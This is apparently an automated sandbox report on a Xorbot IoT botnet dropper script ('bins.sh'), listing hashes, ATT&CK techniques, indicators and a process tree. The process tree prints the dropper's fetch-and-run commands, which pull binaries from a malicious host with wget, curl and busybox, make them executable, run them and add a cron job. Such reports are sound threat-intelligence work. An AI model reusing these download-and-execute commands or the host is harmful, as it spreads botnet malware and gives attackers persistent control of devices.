xorbot | 67fb57dc230fd70fdae2f18e1bf44b691a40dc151334bf7d5e95322e60466aa1

Analysis

max time kernel
150s
max time network
154s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
28/02/2025, 05:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

97982e7de5b089918c84f5769ac0eda3
SHA1

6e77d8eaa36a9266927f0df9223d11d8808101b7
SHA256

67fb57dc230fd70fdae2f18e1bf44b691a40dc151334bf7d5e95322e60466aa1
SHA512

43c04300d6151b49107a0bc06e8a1eda6a74ba3367ee27933744e882cd51859a0069ec4248ea40b477307795cabb8d3c16ef467c1a5e0879a2b1fb1b45fde454
SSDEEP

192:u4AFWyxBRpm/DWgxh237Ix3ShrKLxh237sk4AFWyxJRpm/DIa:u4AFWyxBRpm/DWgxh237Ix3ShrKLxh2K

Score

10^/10

xorbot antivm botnet defense_evasion discovery execution persistence privilege_escalation trojan

Malware Config

Signatures

Detects Xorbot 2 IoCs

botnet trojan

resource	yara_rule
behavioral2/files/fstream-1.dat	family_xorbot
behavioral2/files/fstream-8.dat	family_xorbot

Xorbot
Xorbot is a linux botnet and trojan targeting IoT devices.
botnet trojan xorbot
Xorbot family
xorbot
Contacts a large (1523) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 5 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
739	chmod
779	chmod
802	chmod
816	chmod
825	chmod

Executes dropped EXE 3 IoCs

ioc	pid	Process
/tmp/XQw82vXECRUV429SDvD0heUyhUITAYsq7p	741	bins.sh
/tmp/PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc	781	bins.sh
/tmp/jtalLdU2R33p8UkxEtvXMaeU2SzTSSthTT	803	bins.sh

Renames itself 1 IoCs

pid	Process
782	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc

Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalation

Cron

T1053.003

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.2Zjn5V	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Checks CPU configuration 1 TTPs 2 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/963/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/167/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/941/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/1003/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/22/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/898/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/993/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/1037/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/12/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/828/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/868/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/1005/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/1017/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/738/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/815/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/844/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/11/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/27/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/908/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/925/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/989/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/1022/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/927/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/2/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/106/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/865/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/884/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/912/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/953/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/987/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/29/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/629/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/879/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/934/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/991/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/1036/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/16/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/830/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/874/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/913/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/994/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/1000/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/3/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/25/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/145/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/293/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/961/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/15/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/672/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/674/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/799/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/919/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/1018/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/220/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/849/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/939/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/956/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/20/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/26/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/666/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/794/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/903/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
File opened for reading	/proc/914/cmdline	PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc

System Network Configuration Discovery 1 TTPs 16 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
754	curl
795	wget
799	busybox
806	wget
820	curl
763	busybox
828	wget
796	curl
808	curl
819	wget
821	busybox
691	curl
744	wget
809	busybox
681	wget
735	busybox

Writes file to tmp directory 6 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc	wget
File opened for modification	/tmp/PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc	curl
File opened for modification	/tmp/jtalLdU2R33p8UkxEtvXMaeU2SzTSSthTT	busybox
File opened for modification	/tmp/XQw82vXECRUV429SDvD0heUyhUITAYsq7p	wget
File opened for modification	/tmp/XQw82vXECRUV429SDvD0heUyhUITAYsq7p	curl
File opened for modification	/tmp/XQw82vXECRUV429SDvD0heUyhUITAYsq7p	busybox

/tmp/bins.sh
/tmp/bins.sh
1⤵
- Executes dropped EXE
PID:674
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:677
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/XQw82vXECRUV429SDvD0heUyhUITAYsq7p
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:681
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/XQw82vXECRUV429SDvD0heUyhUITAYsq7p
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:691
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/XQw82vXECRUV429SDvD0heUyhUITAYsq7p
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:735
- /bin/chmod
  chmod 777 XQw82vXECRUV429SDvD0heUyhUITAYsq7p
  2⤵
  - File and Directory Permissions Modification
  PID:739
- /tmp/XQw82vXECRUV429SDvD0heUyhUITAYsq7p
  ./XQw82vXECRUV429SDvD0heUyhUITAYsq7p
  2⤵
  PID:741
- /bin/rm
  rm XQw82vXECRUV429SDvD0heUyhUITAYsq7p
  2⤵
  PID:743
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:744
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
  2⤵
  - Checks CPU configuration
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:754
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
  2⤵
  - System Network Configuration Discovery
  PID:763
- /bin/chmod
  chmod 777 PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
  2⤵
  - File and Directory Permissions Modification
  PID:779
- /tmp/PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
  ./PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
  2⤵
  - Renames itself
  - Reads runtime system information
  PID:781
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:783
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:784
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:786
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:787
- /bin/rm
  rm PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc
  2⤵
  PID:792
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/jtalLdU2R33p8UkxEtvXMaeU2SzTSSthTT
  2⤵
  - System Network Configuration Discovery
  PID:795
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/jtalLdU2R33p8UkxEtvXMaeU2SzTSSthTT
  2⤵
  - System Network Configuration Discovery
  PID:796
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/jtalLdU2R33p8UkxEtvXMaeU2SzTSSthTT
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:799
- /bin/chmod
  chmod 777 jtalLdU2R33p8UkxEtvXMaeU2SzTSSthTT
  2⤵
  - File and Directory Permissions Modification
  PID:802
- /tmp/jtalLdU2R33p8UkxEtvXMaeU2SzTSSthTT
  ./jtalLdU2R33p8UkxEtvXMaeU2SzTSSthTT
  2⤵
  PID:803
- /bin/rm
  rm jtalLdU2R33p8UkxEtvXMaeU2SzTSSthTT
  2⤵
  PID:804
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/gruoaxGMgRQZWO5yOwdvfvD5o4SVNgL1MN
  2⤵
  - System Network Configuration Discovery
  PID:806
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/gruoaxGMgRQZWO5yOwdvfvD5o4SVNgL1MN
  2⤵
  - System Network Configuration Discovery
  PID:808
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/gruoaxGMgRQZWO5yOwdvfvD5o4SVNgL1MN
  2⤵
  - System Network Configuration Discovery
  PID:809
- /bin/chmod
  chmod 777 gruoaxGMgRQZWO5yOwdvfvD5o4SVNgL1MN
  2⤵
  - File and Directory Permissions Modification
  PID:816
- /tmp/gruoaxGMgRQZWO5yOwdvfvD5o4SVNgL1MN
  ./gruoaxGMgRQZWO5yOwdvfvD5o4SVNgL1MN
  2⤵
  PID:817
- /bin/rm
  rm gruoaxGMgRQZWO5yOwdvfvD5o4SVNgL1MN
  2⤵
  PID:818
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/H11TJvLrCzY1ljoKMMJAJaiTL7lrqZf6Fs
  2⤵
  - System Network Configuration Discovery
  PID:819
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/H11TJvLrCzY1ljoKMMJAJaiTL7lrqZf6Fs
  2⤵
  - System Network Configuration Discovery
  PID:820
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/H11TJvLrCzY1ljoKMMJAJaiTL7lrqZf6Fs
  2⤵
  - System Network Configuration Discovery
  PID:821
- /bin/chmod
  chmod 777 H11TJvLrCzY1ljoKMMJAJaiTL7lrqZf6Fs
  2⤵
  - File and Directory Permissions Modification
  PID:825
- /tmp/H11TJvLrCzY1ljoKMMJAJaiTL7lrqZf6Fs
  ./H11TJvLrCzY1ljoKMMJAJaiTL7lrqZf6Fs
  2⤵
  PID:826
- /bin/rm
  rm H11TJvLrCzY1ljoKMMJAJaiTL7lrqZf6Fs
  2⤵
  PID:827
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/ZZrFP0yKHuQqewCCsQ04bnxnKpXwoNAspk
  2⤵
  - System Network Configuration Discovery
  PID:828

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/PuLVT8u2J1tdyNOM2gg7VZx17vL6861Mtc

Filesize
177KB

MD5
786d75a158fe731feca3880f436082c0

SHA1
79ea2734e43d00cdeabed5586b2c1994d02aef3e

SHA256
5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18

SHA512
7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f

Download Submit
/tmp/XQw82vXECRUV429SDvD0heUyhUITAYsq7p

Filesize
112KB

MD5
05d7857dcead18bbd86d2935f591873c

SHA1
34d18f41ef35f93d5364ce3e24d74730a4e91985

SHA256
2cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70

SHA512
d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e

Download Submit
/tmp/jtalLdU2R33p8UkxEtvXMaeU2SzTSSthTT

Filesize
127KB

MD5
89077b7bd4bcafca7713be43635c4862

SHA1
fc02edb8fba29ea8ee99e6157ef8560334530052

SHA256
78416feab0c93152d65acc8f48835520db083cc3aed0aea622b9fb88284dc00d

SHA512
1b457b8f8d452eecaad9013241e50672befb70feb5349f5fa72d62ea1fa8affa968763e6511cc76cdc5bf12f080e4a8f10c8e141ccd0d36794e721d690f2c4b1

Download Submit
/var/spool/cron/crontabs/tmp.2Zjn5V

Filesize
210B

MD5
3fdf754387e2d0d12713569f5cbfbeb9

SHA1
54691be3b02a4fa2b458d3569d43ed12a590a024

SHA256
5b7f9c8001830fbecfc476aba523f88ba6e21f1f6227df6d1b079e49edd6a799

SHA512
7ce656daf92f83ff8f2804d512067f5fc705a85510a46a6d7a4eef7180be13468b2bdcb7f58b164e71dac64763bd262e95a3e441b8f89de295b1dd1a92ac3d86

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads